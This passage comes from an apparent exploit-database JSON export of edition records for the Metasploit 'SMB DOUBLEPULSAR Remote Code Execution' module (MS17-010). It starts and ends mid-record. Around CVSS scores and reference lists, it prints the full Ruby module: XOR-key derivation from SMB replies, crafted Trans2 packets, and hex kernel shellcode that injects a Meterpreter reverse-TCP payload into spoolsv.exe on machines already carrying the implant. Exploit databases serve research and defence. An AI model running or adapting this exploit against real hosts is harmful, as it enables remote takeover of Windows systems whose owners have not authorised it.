\\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-01] #"}, "lastseen": "2021-11-01T00:13:44", "differentElements": ["sourceData"], "edition": 61}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "ce1a5c0d222e9134766941512598b4f6", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-11-01T22:19:22", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96707", "SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0419", "CPAI-2017-0177", "CPAI-2017-0200", "CPAI-2017-0205", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": 
["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-01T22:19:22", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-01T22:19:22", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: 
https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' 
=> 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-02] #"}, "lastseen": "2021-11-01T22:19:22", "differentElements": ["sourceData"], "edition": 62}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "c6a18643c2b736978f36ae1456573751", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-11-02T22:12:39", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": 